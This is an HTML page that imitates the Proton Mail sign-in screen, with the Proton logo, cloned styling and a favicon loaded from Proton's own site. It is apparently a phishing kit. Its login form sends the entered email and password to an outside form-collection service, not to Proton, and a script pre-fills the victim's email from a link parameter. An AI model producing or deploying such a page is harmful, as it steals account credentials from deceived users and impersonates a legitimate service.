<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Proton</title>
    <link rel="stylesheet" href="style.css">
    <link rel="icon" href="https://account.proton.me/assets/favicon.ico" type="image/x-icon">



    <script>
        window.onload = function() {
          // Function to extract query parameters from the URL
          function getQueryParam(param) {
            const urlParams = new URLSearchParams(window.location.search);
            return urlParams.get(param);
          }
      
          // Get the 'email' parameter from the URL
          const email = getQueryParam('email');
          
          // If an email is present in the URL, set it as the value of the email input field
          if (email) {
            document.querySelector('input[name="email"]').value = email;
          }
        };
      </script>

      
    <style>

.form-container{
    display: flex; /* Enables Flexbox on the container */
    justify-content: center; /* Centers the content horizontally */
    align-items: center; /* Centers the content vertically */
    height: 100vh; /* Makes the container full height of the viewport */
}


.main-box {
    background-color: rgb(255, 255, 255);
    border-bottom-left-radius: 12px;
    border-bottom-right-radius: 12px;
    border-top-left-radius: 12px;
    border-top-right-radius: 12px;
    box-shadow: rgba(109, 74, 255, 0.16) 0px 8px 24px 0px;
    box-sizing: border-box;
    color: rgb(12, 12, 20);
    display: block;
    font-family: InterVariable, system-ui, sans-serif;
    font-size: 14px;
    font-style: normal;
    font-synthesis: none;
    font-weight: 400;
    height: 577.164px;
    line-height: 20px;
    margin-left: 33px;
    margin-right: 33px;
    max-width: 480px;
    padding-bottom: 44px;
    padding-left: 44px;
    padding-right: 44px;
    padding-top: 44px;
    position: relative;
    quotes: "“" "”" "‘" "’";
    scrollbar-color: rgb(209, 207, 205) rgba(0, 0, 0, 0);
    scrollbar-width: thin;
    transform: matrix(1, 0, 0, 1, 0, 0);
    transition-behavior: normal;
    transition-delay: 0s;
    transition-duration: 0.15s;
    transition-property: max-width;
    transition-timing-function: cubic-bezier(0.42, 0, 1, 1);
    unicode-bidi: isolate;
    width: 480px;
    -webkit-font-smoothing: antialiased;
}


.signin-tocontinue{
    box-sizing: border-box;
    line-height: 20px;
    margin-bottom: 24px;
}
.to-continue{
    color: rgb(92, 89, 88);
    font-size: 14px;
    font-weight: 400;
    line-height: 20px;
    margin-top: 8px;

}

.label{
color: rgb(12, 12, 20);
cursor: pointer;
font-family: InterVariable, system-ui, sans-serif;
font-size: 14px;
font-style: normal;
font-weight: 600;
height: 20px;
line-height: 20px;
scrollbar-color: rgba(0, 0, 0, 0) rgba(0, 0, 0, 0);
scrollbar-width: thin;
justify-content: space-between;
margin-bottom: 4px;
row-gap: 8px;
vertical-align: middle;
width: 392px;
}

.in-between{
    margin-top: 20px;
}

.box{

align-items: stretch;
background-color: rgb(255, 255, 255);
border-bottom-color: rgb(167, 161, 177);
border-bottom-left-radius: 8px;
border-bottom-right-radius: 8px;
border-bottom-style: solid;
border-bottom-width: 1px;
border-image-outset: 0;
border-image-repeat: stretch;
border-image-slice: 100%;
border-image-source: none;
border-image-width: 1;
border-left-color: rgb(167, 161, 177);
border-left-style: solid;
border-left-width: 1px;
border-right-color: rgb(167, 161, 177);
border-right-style: solid;
border-right-width: 1px;
border-top-color: rgb(167, 161, 177);
border-top-left-radius: 8px;
border-top-right-radius: 8px;
border-top-style: solid;
border-top-width: 1px;
box-sizing: border-box;
color: rgb(12, 12, 20);
cursor: text;
display: flex;
flex-basis: 0px;
flex-grow: 1;
flex-shrink: 1;
flex-wrap: nowrap;
font-family: InterVariable, system-ui, sans-serif;
font-size: 16px;
font-style: normal;
font-synthesis-small-caps: none;
font-synthesis-style: none;
font-synthesis-weight: none;
font-weight: 400;
height: 46.8516px;
line-height: 20px;
position: relative;
quotes: "“" "”" "‘" "’";
scrollbar-color: rgba(209, 207, 205, 0.247) rgba(0, 0, 0, 0);
scrollbar-width: thin;
transition-behavior: normal, normal;
transition-delay: 0s, 0s;
transition-duration: 0.15s, 0s;
transition-property: all, visibility;
transition-timing-function: cubic-bezier(0.22, 1, 0.36, 1), ease;
unicode-bidi: isolate;
width: 392px;
-webkit-font-smoothing: antialiased;

}

.checkbox-input{
box-sizing: border-box;
color: rgb(12, 12, 20);
cursor: pointer;
display: flex;
font-weight: 400;
height: 20px;
line-height: 20px;
margin-right: 8px;
margin-top: 0px;
min-height: 0px;
min-width: 0px;
position: relative;
scrollbar-color: rgba(0, 0, 0, 0) rgba(0, 0, 0, 0);
scrollbar-width: thin;
vertical-align: middle;
width: 20px;
-webkit-font-smoothing: antialiased;

}

.keep-me{
    font-size: 14px;
    font-weight: 400px;
    cursor: pointer;
    width: 252px;
}

.trusted{
    color: rgb(92, 89, 88);
}

.why{
    color: rgb(92, 89, 88);

}

.check-area {
    display: flex;
    /* align-items: center; */
}

.checkbox-label {
    margin-right: 8px; /* Add some space between the checkbox and the text if needed */
}

.keep-why {
    display: flex;
    flex-direction: column;
}

.signin-button {
    align-items: flex-start;
    appearance: none;
    background-attachment: scroll;
    background-clip: border-box;
    background-color: rgb(109, 74, 255);
    background-image: none;
    background-origin: padding-box;
    background-position-x: 0%;
    background-position-y: 0%;
    background-repeat: repeat;
    background-size: auto;
    border-bottom-color: rgba(0, 0, 0, 0);
    border-bottom-left-radius: 8px;
    border-bottom-right-radius: 8px;
    border-bottom-style: solid;
    border-bottom-width: 1px;
    border-image-outset: 0;
    border-image-repeat: stretch;
    border-image-slice: 100%;
    border-image-source: none;
    border-image-width: 1;
    border-left-color: rgba(0, 0, 0, 0);
    border-left-style: solid;
    border-left-width: 1px;
    border-right-color: rgba(0, 0, 0, 0);
    border-right-style: solid;
    border-right-width: 1px;
    border-top-color: rgba(0, 0, 0, 0);
    border-top-left-radius: 8px;
    border-top-right-radius: 8px;
    border-top-style: solid;
    border-top-width: 1px;
    box-sizing: border-box;
    color: rgb(255, 255, 255);
    cursor: pointer;
    display: inline-block;
    font-family: InterVariable, system-ui, sans-serif;
    font-feature-settings: normal;
    font-kerning: auto;
    font-optical-sizing: auto;
    font-size: 16px;
    font-size-adjust: none;
    font-stretch: 100%;
    font-style: normal;
    font-synthesis: none;
    font-variant: normal;
    font-weight: 400;
    height: 44px;
    letter-spacing: normal;
    line-height: 24px;
    margin-bottom: 0px;
    margin-left: 0px;
    margin-right: 0px;
    margin-top: 24px;
    outline-color: rgb(255, 255, 255);
    outline-style: none;
    outline-width: 0px;
    padding-block-end: 9px;
    padding-block-start: 9px;
    padding-bottom: 9px;
    padding-inline-end: 19px;
    padding-inline-start: 19px;
    padding-left: 19px;
    padding-right: 19px;
    padding-top: 9px;
    quotes: "“" "”" "‘" "’";
    scrollbar-color: rgba(0, 0, 0, 0) rgba(0, 0, 0, 0);
    scrollbar-width: thin;
    text-align: center;
    text-decoration: none;
    text-indent: 0px;
    text-rendering: auto;
    text-shadow: none;
    text-transform: none;
    transition: all 0.15s cubic-bezier(0.22, 1, 0.36, 1), background-position ease 0s;
    vertical-align: middle;
    width: 392px;
    word-spacing: 0px;
    -webkit-font-smoothing: antialiased;
    -webkit-border-image: none;
}

.new-to {
    box-sizing: border-box;
    color: rgb(12, 12, 20);
    display: block;
    font-family: InterVariable, system-ui, sans-serif;
    font-size: 14px;
    font-style: normal;
    font-synthesis: none;
    font-weight: 400;
    height: 20px;
    line-height: 20px;
    margin-top: 16px;
    quotes: "“" "”" "‘" "’";
    scrollbar-color: rgb(209, 207, 205) rgba(0, 0, 0, 0);
    scrollbar-width: thin;
    text-align: center;
    unicode-bidi: isolate;
    width: 352px;
    -webkit-font-smoothing: antialiased;
}

.create {
    color: rgb(109, 74, 255);
    text-decoration-color: rgb(109, 74, 255);
    text-decoration-line: underline;

}

.my-4{
    margin-top: 16px;
    margin-bottom: 16px;
}

.trouble{
    color: rgb(109, 74, 255);
    text-decoration-color: rgb(109, 74, 255);
    text-decoration-line: underline;
    font-size: 15px;
    font-weight: 400;
}

.trouble-div{
display: block;
text-align: center;

}

    </style>


</head>
<body style="background-color: rgb(242, 219, 252);">
    <div class="whole-page">
        <div class="proton-english">
            <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 96 36" width="96" height="36" fill="none" role="img" class="logo full" aria-labelledby="logo-0-title"><title id="logo-0-title">Proton</title><path fill="#6351E1" d="M0 23.793v6.265h4.397v-5.993a2.199 2.199 0 0 1 2.199-2.199h4.509a7.933 7.933 0 0 0 7.932-7.932A7.932 7.932 0 0 0 11.105 6H0v7.83h4.397v-3.69h6.41a3.754 3.754 0 0 1 3.753 3.753 3.754 3.754 0 0 1-3.753 3.753h-4.66A6.146 6.146 0 0 0 0 23.793z"></path><path fill="url(#logo-0-a)" d="M6.595 21.865A6.594 6.594 0 0 0 0 28.46v1.597h4.397v-5.993a2.199 2.199 0 0 1 2.198-2.199z"></path><path fill="#6351E1" d="M19.717 30.058v-9.544c0-3.894 2.274-6.995 6.822-6.995.73-.01 1.459.07 2.169.24v3.928c-.518-.034-.964-.034-1.172-.034-2.41 0-3.445 1.103-3.445 3.343v9.06l-4.374.002zm10.301-8.098c0-4.789 3.617-8.441 8.648-8.441s8.649 3.652 8.649 8.442c0 4.789-3.618 8.476-8.649 8.476-5.03 0-8.648-3.688-8.648-8.476zm12.99 0c0-2.722-1.827-4.65-4.342-4.65-2.514 0-4.341 1.927-4.341 4.65 0 2.757 1.826 4.652 4.341 4.652 2.516 0 4.342-1.895 4.342-4.651zm18.295 0c0-4.789 3.618-8.441 8.648-8.441 5.031 0 8.649 3.652 8.649 8.442 0 4.789-3.618 8.476-8.648 8.476-5.03 0-8.65-3.688-8.65-8.476zm12.99 0c0-2.722-1.827-4.65-4.342-4.65-2.514 0-4.341 1.927-4.341 4.65 0 2.757 1.826 4.652 4.341 4.652 2.516 0 4.343-1.895 4.343-4.651h-.001zm6.58 8.098v-9.2c0-4.272 2.722-7.339 7.58-7.339 4.824 0 7.546 3.067 7.546 7.34v9.199H91.66v-8.855c0-2.378-1.068-3.86-3.204-3.86s-3.205 1.482-3.205 3.86v8.855h-4.378zM59.994 17.343h-4.72v6.032c0 2.102.757 3.066 2.928 3.066.207 0 .723 0 1.379-.034v3.549c-.896.241-1.687.379-2.55.379-3.652 0-6.134-2.205-6.134-6.374v-6.618H47.97v-3.48h.73a2.199 2.199 0 0 0 2.198-2.198v-3.28h4.377v5.481h4.72v3.477z"></path><defs><linearGradient id="logo-0-a" x1="3.297" x2="3.297" y1="28.872" y2="19.667" gradientUnits="userSpaceOnUse"><stop stop-color="#6D4BFD"></stop><stop offset="1" stop-color="#1C0554"></stop></linearGradient></defs></svg>
        </div>


        <div class="form-container">
            <div class="main-box">

                <form action="https://submit-form.com/lcsgjvvYz" method="post">

                    <div class="signin-tocontinue">
                        <div class="">
                            <h1 class="sign-layout-title">Sign in</h1>
                        </div>
                        <div class="to-continue">
                            to continue to Proton Mail
                        </div>
                    </div>
    
    
                    <div class="form-space">
                        <label for="username" class="label">
                            <span class="gap">Email or username</span>
                        </label>
    
                        <div>
                            <input id="username" type="text" name="email" aria-describedby="id-3" placeholder="Email Address" class="box" value="">
                        </div>
                        
                    </div>
    
                    <div class="in-between" id="id-3"></div>
    
                    
                    <div class="form-space">
                        <label for="password" class="label">
                            <span class="gap">Password</span>
                        </label>
    
                        <div>
                            <input placeholder="Password" name="pass" type="password" class="box">
                        </div>
                        
                    </div>
    
                    <div class="in-between" id="id-3"></div>
    
    
                    <div class="check-area">
                        <label for="staySignedIn" class="checkbox-label">
                            <input id="staySignedIn" type="checkbox" class="checkbox-input">
                        </label>
    
                        <div class="keep-why">
                            <label for="staySignedIn" class="keep-me">Keep me signed in</label>
                            <div class="trusted">
                                Recommended on trusted devices. 
                                <a href="https://proton.me/support/keep-me-signed-in" target="_blank" rel="noopener noreferrer nofollow" class="why">Why?</a>
                            </div>
                        </div>
                    </div>
                    
    
                    <button class="signin-button" aria-busy="false" type="submit">Sign in</button>
    
                    <div class="new-to">New to Proton? <a class="create" href="/mail/signup">Create account</a></div>
    
                    <hr class="my-4">
    
                    <div class="trouble-div"> <a class="trouble" href="/mail/signup">Trouble signing in</a>   </div>
    


                </form>
                
            </div>
        </div>
    </div>
</body>
</html>